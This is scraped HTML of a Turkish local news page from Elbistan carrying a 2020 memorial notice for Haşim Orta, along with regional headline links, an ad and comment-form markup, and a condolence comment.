<br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/fuzulev_gif_980.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-en-kapsamli-koronavirus-denetimi-yapildi-h67354.html" title="Elbistan’da en kapsamlı koronavirüs denetimi yapıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/08/Ysimsiz-1_4.jpg" alt="Elbistan’da en kapsamlı koronavirüs denetimi yapıldı" class="pull-left" /> <div class="caption-line"><p>Elbistan’da en kapsamlı koronavirüs denetimi...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-egitim-yatirimlarini-inceledi-h67353.html" title="Kaymakam Demir eğitim yatırımlarını inceledi" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/08/Ysimsiz-1_3.jpg" alt="Kaymakam Demir eğitim yatırımlarını inceledi" class="pull-left" /> <div class="caption-line"><p>Kaymakam Demir eğitim yatırımlarını inceledi</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/anadolunun-cerenleri-180-yil-once-yasadiklari-nurhaka-geri-donuyor-h67351.html" title="Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/08/Ysimsiz-1_2.jpg" alt="Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor" class="pull-left" /> <div class="caption-line"><p>Anadolu’nun ‘cerenleri’ 180 yıl önce...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/hazineye-ait-61-adet-tasinmaz-yeniden-ihaleye-cikiyor-h67340.html" title="Hazine’ye ait 61 adet taşınmaz yeniden ihaleye çıkıyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/08/Ysimsiz-1_1.jpg" alt="Hazine’ye ait 61 adet taşınmaz yeniden ihaleye çıkıyor" class="pull-left" /> <div class="caption-line"><p>Hazine’ye ait 61 adet taşınmaz...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/unal-kahramanmaras-ve-ilceleri-icin-hazirladigimiz-buyuk-bir-proje-var-h67328.html" title="Ünal: “Kahramanmaraş ve ilçeleri için hazırladığımız büyük bir proje var”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/08/Ysimsiz-1.jpg" alt="Ünal: “Kahramanmaraş ve ilçeleri için hazırladığımız büyük bir proje var”" class="pull-left" /> <div class="caption-line"><p>Ünal: “Kahramanmaraş ve ilçeleri için...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Anma/ Haşim ORTA</h1> <h2 class="lead" itemprop="description"><strong></strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-08-05 15:14:41" content="2020-08-05T15:14:41+02:00">05 Ağustos 2020 Çarşamba 15:14</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/anma_hasim_orta_h67346_54f64.jpg" alt="Anma/ Haşim ORTA" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/anma-hasim-orta-h67346.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistaninsesi.com/banner.php?id=17" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/gocbal1_2.gif" width="336" height="280" style="width:336px;height: 280px;border:0" alt="banner17" /></a></div> <div class="reklam reklam135 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=43" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/600-animasyon_1.gif" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner43" /></a></div> <div itemprop="articleBody" id="newsbody"><p><img src="/images/upload/anma ha&#x15F;im orta.jpg" width="640" height="920" alt=""></img></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/6-saatlik-elektrik-kesintisi-yapilacak-h67356.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-en-kapsamli-koronavirus-denetimi-yapildi-h67354.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-egitim-yatirimlarini-inceledi-h67353.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/anadolunun-cerenleri-180-yil-once-yasadiklari-nurhaka-geri-donuyor-h67351.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bakan-soylu-en-yogun-koronavirus-denetimini-gerceklestirecegiz-h67347.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/il-genelinde-taziye-ziyaretleri-yasaklandi-h67345.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bpet-yalcin-petrol-yenilenen-yuzuyle-hizmette-h67350.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/itfaiye-cami-kubbesine-dusen-yavru-leylek-icin-seferber-oldu-h67349.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uyusturucu-operasyonunda-2-kisi-tutuklandi-h67344.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hazineye-ait-61-adet-tasinmaz-yeniden-ihaleye-cikiyor-h67340.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elma-ic-kurdu-icin-5-ilaclama-zamani-basladi-h67339.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/akedastan-tuketicilere-mobil-uygulama-hizmeti-h67338.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-ile-hafif-ticari-arac-carpisti2-yarali-h67337.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/acik-ogretim-lisesi-ilk-kayit-ve-kayit-yenileme-takvimi-aciklandi-h67341.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kmbbden-akulu-arac-hediye-h67342.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uc-aracin-karistigi-kaza-ucuz-atlatildi-h67336.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/malatya-daki-deprem-elbistan-da-da-hissedildi-h67335.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-1-yarali-h67334.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-kahramanmaras-ve-ilceleri-icin-hazirladigimiz-buyuk-bir-proje-var-h67328.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/karahasanli-hayirsever-isadami-kapidereye-cami-yaptiriyor-h67319.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gurbuz-belediye-tarihinde-bir-ilki-gerceklestirip-yatirim-tesvik-belgesi-aldik-h67318.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tufekle-oynayan-cocuk-4-yasindaki-kiz-kardesini-vurdu-h67330.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bbp-de-bayram-coskusu-yasandi-h67329.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-takla-atti-1-olu-4-yarali-h67327.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demirden-kurban-bayrami-mesaji-h67317.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/6-saatlik-elektrik-kesintisi-yapilacak-h67356.html" title="6 saatlik elektrik kesintisi yapılacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/6_saatlik_elektrik_kesintisi_yapilacak_h67356_af472.jpg" alt="6 saatlik elektrik kesintisi yapılacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">6 saatlik elektrik kesintisi yapılacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-en-kapsamli-koronavirus-denetimi-yapildi-h67354.html" title="Elbistan’da en kapsamlı koronavirüs denetimi yapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/elbistanda_en_kapsamli_koronavirus_denetimi_yapildi_h67354_f872a.jpg" alt="Elbistan’da en kapsamlı koronavirüs denetimi yapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da en kapsamlı koronavirüs denetimi yapıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-egitim-yatirimlarini-inceledi-h67353.html" title="Kaymakam Demir eğitim yatırımlarını inceledi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/kaymakam_demir_egitim_yatirimlarini_inceledi_h67353_83883.jpg" alt="Kaymakam Demir eğitim yatırımlarını inceledi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir eğitim yatırımlarını inceledi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/anadolunun-cerenleri-180-yil-once-yasadiklari-nurhaka-geri-donuyor-h67351.html" title="Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/anadolunun_cerenleri_180_yil_once_yasadiklari_nurhaka_geri_donuyor_h67351_4d617.jpg" alt="Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Anadolu’nun ‘cerenleri’ 180 yıl önce yaşadıkları Nurhak’a geri dönüyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bakan-soylu-en-yogun-koronavirus-denetimini-gerceklestirecegiz-h67347.html" title="Bakan Soylu: “En yoğun koronavirüs denetimini gerçekleştireceğiz”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/bakan_soylu_en_yogun_koronavirus_denetimini_gerceklestirecegiz_h67347_ac68d.jpg" alt="Bakan Soylu: “En yoğun koronavirüs denetimini gerçekleştireceğiz”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bakan Soylu: “En yoğun koronavirüs denetimini gerçekleştireceğiz”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/il-genelinde-taziye-ziyaretleri-yasaklandi-h67345.html" title="İl genelinde taziye ziyaretleri yasaklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/il_genelinde_taziye_ziyaretleri_yasaklandi_h67345_1a4d8.jpg" alt="İl genelinde taziye ziyaretleri yasaklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">İl genelinde taziye ziyaretleri yasaklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bpet-yalcin-petrol-yenilenen-yuzuyle-hizmette-h67350.html" title="Bpet Yalçın Petrol yenilenen yüzüyle hizmette"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/bpet_yalcin_petrol_yenilenen_yuzuyle_hizmette_h67350_b7a45.jpg" alt="Bpet Yalçın Petrol yenilenen yüzüyle hizmette" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bpet Yalçın Petrol yenilenen yüzüyle hizmette</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/itfaiye-cami-kubbesine-dusen-yavru-leylek-icin-seferber-oldu-h67349.html" title="İtfaiye, cami kubbesine düşen yavru leylek için seferber oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/itfaiye_cami_kubbesine_dusen_yavru_leylek_icin_seferber_oldu_h67349_779b6.jpg" alt="İtfaiye, cami kubbesine düşen yavru leylek için seferber oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">İtfaiye, cami kubbesine düşen yavru leylek için seferber oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-operasyonunda-2-kisi-tutuklandi-h67344.html" title="Uyuşturucu operasyonunda 2 kişi tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/uyusturucu_operasyonunda_2_kisi_tutuklandi_h67344_d633b.jpg" alt="Uyuşturucu operasyonunda 2 kişi tutuklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Uyuşturucu operasyonunda 2 kişi tutuklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hazineye-ait-61-adet-tasinmaz-yeniden-ihaleye-cikiyor-h67340.html" title="Hazine’ye ait 61 adet taşınmaz yeniden ihaleye çıkıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/hazineye_ait_61_adet_tasinmaz_yeniden_ihaleye_cikiyor_h67340_28306.jpg" alt="Hazine’ye ait 61 adet taşınmaz yeniden ihaleye çıkıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hazine’ye ait 61 adet taşınmaz yeniden ihaleye çıkıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elma-ic-kurdu-icin-5-ilaclama-zamani-basladi-h67339.html" title="Elma iç kurdu için 5. ilaçlama zamanı başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/elma_ic_kurdu_icin_5_ilaclama_zamani_basladi_h67339_257f8.jpg" alt="Elma iç kurdu için 5. ilaçlama zamanı başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elma iç kurdu için 5. ilaçlama zamanı başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/akedastan-tuketicilere-mobil-uygulama-hizmeti-h67338.html" title="AKEDAŞ’tan tüketicilere mobil uygulama hizmeti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/akedastan_tuketicilere_mobil_uygulama_hizmeti_h67338_4a517.jpg" alt="AKEDAŞ’tan tüketicilere mobil uygulama hizmeti" /> <div class="carousel-caption"> <h2> <span style="font-size:">AKEDAŞ’tan tüketicilere mobil uygulama hizmeti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-ile-hafif-ticari-arac-carpisti2-yarali-h67337.html" title="Otomobil ile hafif ticari araç çarpıştı:2 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/otomobil_ile_hafif_ticari_arac_carpisti2_yarali_h67337_eb02c.jpg" alt="Otomobil ile hafif ticari araç çarpıştı:2 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil ile hafif ticari araç çarpıştı:2 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/acik-ogretim-lisesi-ilk-kayit-ve-kayit-yenileme-takvimi-aciklandi-h67341.html" title="Açık Öğretim Lisesi ilk kayıt ve kayıt yenileme takvimi açıklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/acik_ogretim_lisesi_ilk_kayit_ve_kayit_yenileme_takvimi_aciklandi_h67341_428d2.jpg" alt="Açık Öğretim Lisesi ilk kayıt ve kayıt yenileme takvimi açıklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Açık Öğretim Lisesi ilk kayıt ve kayıt yenileme takvimi açıklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kmbbden-akulu-arac-hediye-h67342.html" title="KMBB’den akülü araç hediye"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/kmbbden_akulu_arac_hediye_h67342_9616b.jpg" alt="KMBB’den akülü araç hediye" /> <div class="carousel-caption"> <h2> <span style="font-size:">KMBB’den akülü araç hediye</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uc-aracin-karistigi-kaza-ucuz-atlatildi-h67336.html" title="Üç aracın karıştığı kaza ucuz atlatıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/uc_aracin_karistigi_kaza_ucuz_atlatildi_h67336_815e3.jpg" alt="Üç aracın karıştığı kaza ucuz atlatıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Üç aracın karıştığı kaza ucuz atlatıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/malatya-daki-deprem-elbistan-da-da-hissedildi-h67335.html" title="Malatya&#039;daki deprem, Elbistan&#039;da da hissedildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/malatya_daki_deprem_elbistan_da_da_hissedildi_h67335_fee96.jpg" alt="Malatya&#039;daki deprem, Elbistan&#039;da da hissedildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Malatya&#039;daki deprem, Elbistan&#039;da da hissedildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-1-yarali-h67334.html" title="Otomobil elektrik direğine çarptı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/otomobil_elektrik_diregine_carpti_1_yarali_h67334_72f8c.jpg" alt="Otomobil elektrik direğine çarptı: 1 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil elektrik direğine çarptı: 1 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unal-kahramanmaras-ve-ilceleri-icin-hazirladigimiz-buyuk-bir-proje-var-h67328.html" title="Ünal: “Kahramanmaraş ve ilçeleri için hazırladığımız büyük bir proje var”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/unal_kahramanmaras_ve_ilceleri_icin_hazirladigimiz_buyuk_bir_proje_var_h67328_cd6b9.jpg" alt="Ünal: “Kahramanmaraş ve ilçeleri için hazırladığımız büyük bir proje var”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal: “Kahramanmaraş ve ilçeleri için hazırladığımız büyük bir proje var”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/karahasanli-hayirsever-isadami-kapidereye-cami-yaptiriyor-h67319.html" title="Karahasanlı hayırsever işadamı Kapıdere’ye cami yaptırıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/07/karahasanli_hayirsever_isadami_kapidereye_cami_yaptiriyor_h67319_70d13.jpg" alt="Karahasanlı hayırsever işadamı Kapıdere’ye cami yaptırıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Karahasanlı hayırsever işadamı Kapıdere’ye cami yaptırıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gurbuz-belediye-tarihinde-bir-ilki-gerceklestirip-yatirim-tesvik-belgesi-aldik-h67318.html" title="Gürbüz: “Belediye tarihinde bir ilki gerçekleştirip yatırım teşvik belgesi aldık”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/07/gurbuz_belediye_tarihinde_bir_ilki_gerceklestirip_yatirim_tesvik_belgesi_aldik_h67318_98f7e.jpg" alt="Gürbüz: “Belediye tarihinde bir ilki gerçekleştirip yatırım teşvik belgesi aldık”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gürbüz: “Belediye tarihinde bir ilki gerçekleştirip yatırım teşvik belgesi aldık”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tufekle-oynayan-cocuk-4-yasindaki-kiz-kardesini-vurdu-h67330.html" title="Tüfekle oynayan çocuk, 4 yaşındaki kız kardeşini vurdu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/tufekle_oynayan_cocuk_4_yasindaki_kiz_kardesini_vurdu_h67330_9a299.jpg" alt="Tüfekle oynayan çocuk, 4 yaşındaki kız kardeşini vurdu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Tüfekle oynayan çocuk, 4 yaşındaki kız kardeşini vurdu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bbp-de-bayram-coskusu-yasandi-h67329.html" title="BBP&#039;de bayram coşkusu yaşandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/bbp_de_bayram_coskusu_yasandi_h67329_a509a.jpg" alt="BBP&#039;de bayram coşkusu yaşandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">BBP&#039;de bayram coşkusu yaşandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-takla-atti-1-olu-4-yarali-h67327.html" title="Otomobil takla attı: 1 ölü, 4 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/08/otomobil_takla_atti_1_olu_4_yarali_h67327_a528d.jpg" alt="Otomobil takla attı: 1 ölü, 4 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil takla attı: 1 ölü, 4 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-kurban-bayrami-mesaji-h67317.html" title="Kaymakam Demir’den Kurban Bayramı mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/07/kaymakam_demirden_kurban_bayrami_mesaji_h67317_e1b0b.jpg" alt="Kaymakam Demir’den Kurban Bayramı mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir’den Kurban Bayramı mesajı</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Anma%2F+Ha%C5%9Fim+ORTA" title="Anma/ Haşim ORTA haberleri">Anma/ Haşim ORTA</a></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">9</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/anma-hasim-orta-h67346.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(67346);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="67346" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="3a26f9a27ff46bde5fb59d08b9ed5cd5213b560e" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> <div id="comment_list"> <div class="comment_box row-fluid" id="comment_310110"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Zekai Kılınç/ Kayseri</b> <small class="time">1 gün önce</small> <p class="text">Allah rahmet eylesin. Mekanı cennet olsun.</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Zekai Kılınç/ Kayseri" id="310110"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310110" onclick="like(310110,'ajax_comment_like.php?like', 0)"><span class="glyphicons 